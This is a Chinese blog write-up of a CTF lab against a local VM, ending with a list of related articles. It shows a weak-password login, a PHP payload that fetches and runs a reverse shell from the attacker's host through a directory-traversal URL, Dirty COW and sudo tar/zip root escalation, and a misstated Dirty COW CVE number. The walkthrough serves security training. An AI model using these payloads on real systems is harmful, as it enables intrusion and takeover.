CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权

最新推荐文章于 2024-05-18 15:26:36 发布
最新推荐文章于 2024-05-18 15:26:36 发布
阅读量1.3k 收藏 6
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/su__xiaoyan/article/details/112291552
版权

实验环境

攻击者:Kali Linux(192.168.0.19)
靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(64-bit)(192.168.0.249)

实验流程

  • 端口扫描
    在这里插入图片描述
  • 目录扫描
    其中/dbadmin/疑似网站数据库后台管理页面
    在这里插入图片描述
  • 访问url:http://192.168.0.249/dbadmin
    在这里插入图片描述在这里插入图片描述
  • 弱口令:admin
    在这里插入图片描述
  • 该web程序为phpliteadmin v1.9.3,存在远程代码执行漏洞,没有溢出代码,但是有一个利用文档中包含了对于该web应用程序getshell的流程,其中上传的PHP脚本文件需要进行访问才能生效。
    在这里插入图片描述在这里插入图片描述
  • 漏洞探测
    通过对该网站进行漏洞扫描发现该网站存在目录遍历漏洞
    在这里插入图片描述
  • 目录遍历漏洞验证
    在这里插入图片描述
  • 结合phpliteadmin的代码执行漏洞和目录遍历漏洞getshell
    输入数据库名称,点击create创建数据库——hack.php
    在这里插入图片描述点击新创建的数据库,输入数据表名称和数据表中的字段数量,点击go,创建数据表
    在这里插入图片描述输入字段名、字段类型,点击create创建字段,注意字段类型选择text。
    在这里插入图片描述准备好要上传到服务器上面的文件
    在这里插入图片描述
    利用python创建HTTP服务,将root用户的家目录作为网站的根目录
    在这里插入图片描述
    点击新创建的数据库,选中新创建的数据表,点击insert插入数据。<?php system("wget http://192.168.0.19:8000/shell.php -O /tmp/shell.php; chmod +x /tmp/shell.php; php /tmp/shell.php;"); ?>
    在这里插入图片描述
    攻击机监听端口
    在这里插入图片描述利用目录遍历漏洞访问该文件反弹shell:http://192.168.0.249/view.php?page=…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/usr/databases/hack.php
    在这里插入图片描述
  • 获取当前权限:www-data是Linux操作系统中运行web服务的默认用户(权限较低)
    在这里插入图片描述
  • 获取操作系统内发行版本(Ubuntu 12.04.5 LTS)和内核版本(3.2.0-23-generic)
    在这里插入图片描述
    判断是否存在代码溢出漏洞,有溢出代码
    在这里插入图片描述
  • 利用脏牛提权(cve-2016-5159)
    将提权文件上传到靶机
    溢出代码下地址:https://github.com/FireFart/dirtycow
    在这里插入图片描述
    在这里插入图片描述访问对应的数据库文件
    在这里插入图片描述在这里插入图片描述
    优化shell
    在这里插入图片描述
    编译并执行溢出代码
    在这里插入图片描述
    赋予执行权限
    在这里插入图片描述
    执行溢出代码
    在这里插入图片描述
    切换用户
    在这里插入图片描述
  • 获取flag
    在这里插入图片描述
  • 利用密码复用进行提权
    因为需要涉及到切换用户的问题同样需要利用python优化shell
    利用获取到的低权限用户在系统中搜寻敏感信息,寻找一些可能存储了密码的敏感文件或者网站的配置文件等,一定要查看系统用户的家目录。
    在这里插入图片描述
    通过查看网站的配置文件拿到数据库用户zico的登录密码
    在这里插入图片描述
    尝试使用该密码切换到zico用户,成功
    在这里插入图片描述
    查看当前用户权限,普通系统用户。
    在这里插入图片描述
    查看当前用户使用sudo命令时的权限
    当前用户在使用tar命令和zip命令时拥有root用户的权限,并且不需要验证密码
    在这里插入图片描述
    利用zip提权
    首先创建一个空文件
    在这里插入图片描述
    提权成功
    在这里插入图片描述
    同样可以利用tar命令进行提权
    sudo -u root tar cf /dev/null exp -checkpoint=1 --checkpoint-action="/bin/bash"
采姑娘の小蘑菇
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用文件名进行GetShell---CTF题目的相关知识解析
rigous的博客
11-27 3705
0x00 今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一下,主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。 首先主要看了下8084对应的题目,包括一道php登录绕过和命令执行漏洞,整个解题思路一波三折,很有意思。
攻防世界pwn新手练习(get_shell
BurYiA的博客
09-15 6858
get_shell pwn入门题目,做题之前先说几个常用的工具(大佬总不至于跑来找这个题的wp吧 手动狗头) IDA Pro IDA是一款优秀的静态反汇编工具,好处就不多说了,什么一键F5、字符串搜索、函数位置查找等等,好用的不得了,下载可以去看雪论坛找。 pwntools pwntools官网是这样说的:pwntools是一个CTF框架和开发库。它是用Python编写的,旨在快速构建原型和开...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码编码类型的功能,大大减少手工判断和重复尝试的时间,使密码解码更为便捷高效。
弱口令爆破
m0_54024658的博客
05-12 3614
弱口令爆破常见弱口令web登录界面密码爆破1,打开在本地搭建好的pikachu系统,选择基于表单的暴力破解用burpsuite抓取数据包导入repeater模块导入intruder模块开始攻击爆破成功成功登录 今天与大家分享的是弱口令漏洞和验证码绕过,想必大家对弱口令是什么比较感兴趣,请看大屏幕 弱口令是指的是仅包含简单数字和字母的口令,例如"123"、"abc"等,因为这样的口令很容易被别人破解,从而使用户的账号或者网站面临风险,因此不推荐使用。好多学校平台中教务系统学生账号的密码就属于弱口令 ,比如用学
Pikachu 靶场目录遍历通关解析
Flag少侠的博客
05-18 2876
目录遍历(Directory Traversal)是一种攻击技术,攻击者通过利用应用程序中的漏洞,尝试访问服务器上的敏感文件或目录,甚至执行恶意代码。目录遍历攻击通常利用应用程序对用户输入的不充分验证或过滤,以获取超出其授权访问权限的文件或目录路径。攻击者通常使用特殊字符(如../)或编码(如URL编码)来尝试绕过应用程序的访问控制机制。通过在文件或目录路径中添加这些特殊字符或编码,攻击者可以向上导航到父目录,然后访问应用程序所不允许的文件或目录
密码重用的危害及规避方法
weixin_34062469的博客
07-07 974
所谓密码重用就是在多个网站或账户上重复使用相同的密码。当这样的密码被暴露,再加上姓名,登录名,电子信箱地址等其它可识别信息,就会为用户带来信息安全上的危害。 密码重用是如何成为威胁的? 密码重用成为一种安全威胁是因为如果恶意行为者获取了一些可以识别用户身份的信息,他就可以对一个重复使用的密码加以利用。这通常发生在以下情形之一: 在第一种最常见的情况下,恶...
BUUCTF:[SUCTF 2018]GetShell
末初的CSDN博客
08-01 1815
题目地址:https://buuoj.cn/challenges#[SUCTF%202018]GetShell if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal cha
CTFTools-v1.3.7 所有古典密码与现代密码解码与编码与一身
最新发布
06-14
CTF-Tools是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码 本工具是所有MISC集于一身的解密加密工具 古典密码: 1.Affine(仿射加密) 2.Bacon(培根加密) 3.Brainfuck 4.Caesar(凯撒加密)...
ctf-all-in-one
01-30
ctf-all-in-one
ctf脚本-railfence栅栏密码.py
10-25
ctf脚本-railfence栅栏密码.py
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
shenron3(密码复用,netstat提权)
m0_66299232的博客
10-17 416
6.把index.php源码改成php-reverse-shell.php(github里有),保存后,开启监听,访问页面,成功反弹shell。2.找了一通没找到可利用信息,而且我进不去shenron用户下,只能靠运气把唯一的密码输入进去试试。3.查看network命令的特征,是一个查tcp,udp的命令;4.我们新建一个netstat文件写入提权命令,让它替换network。成功进入shenron用户下,用find命令查到一个network。5.提权成功,进入root目录,成功拿下!
getshell本质与深入探究
doudoudedi
03-26 5061
title: 反弹shellcode本质与深入探究 date: 2022-03-24 14:25:01 tags:PWN getshell本质与深入探究 目标 ​ 在做CTF-PWN方向题目时,总体流程就是分析漏洞程序、然后写利用脚本、攻击本地环境、攻击靶机环境得到flag,但是在攻击本地时为什么会获得本地的shell,同时攻击远程靶机时又为什么会获得远程靶机的shell呢?同样当我们攻击一个IOT设备时,会发现使用CTF-PWN中的方法不能够得到一个交互式的shell,今天就来一探究竟 基础 ​ 首先.
目录遍历漏洞
xsyu_liuyan的博客
03-16 1万+
一. 什么是目录遍历漏洞 目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。 二. 目录遍历漏洞原理 程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上
Java防御目录穿越漏洞方法_Elasticsearch漏洞汇总
weixin_33467739的博客
03-01 1500
简介Elasticsearch是一个开源的分布式、RESTful 风格的搜索和数据分析引擎,它的底层是开源库Apache Lucene。Lucene 可以说是当下最先进、高性能、全功能的搜索引擎库——无论是开源还是私有,但它也仅仅只是一个库。为了充分发挥其功能,你需要使用 Java 并将 Lucene 直接集成到应用程序中。 更糟糕的是,您可能需要获得信息检索学位才能了解其工作原理,因为Lucen...
Spring Boot 目录遍历 (CVE-2021_21234)
小小猪的博客
12-31 4364
Spring Boot 目录遍历 (CVE-2021_21234) 漏洞简介: spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端
漏洞目录遍历漏洞
angry_program的博客
01-10 2399
目录遍历漏洞 目录遍历, 也叫路径遍历,由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件 (可以是web根目录以外的文件),甚至可以执行系统命令。 原理 程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。...
【SQL注入漏洞-10】SQL注入-getshell靶场实战
cc
02-08 5665
没有写入webshell的情况有两种:● 网站的路径不对,或者没有使用双斜杠进行转义● secure_file_priv的值不是为空。利用的前提条件: • 知道网站的绝对路径(根目录,或者是根目录往下的目录都可以) • web目录具有写的权限,能够使用单引号 • secure_file_priv没有具体值(在mysql/my.ini中查看)
Web 目录枚举与遍历漏洞解决
热门推荐
11-19 1万+
目录枚举漏洞”解决方法一、名词解释 网站目录枚举漏洞:指黑客利用非法攻击手段扫描符合“8.3”命名原则的目录与文件。二、验证工具:scanner-compiled三、验证方法 图 1 四、解决方法1、打开注册表,进入 HKLM\SYSTEM\CurrentControlSet\Control\FileSystem,新建 DWORD值 NtfsDisable8dot3NameCreatio
CTF windows 提权
09-06
对于Windows系统的CTF(Capture The Flag)比赛中,常见的提权方式有以下几种: 1. 弱口令:尝试使用常见的弱口令对系统中的用户账户进行登录,如果成功登录则获取管理员权限。 2. 利用漏洞:搜索系统中已知的漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值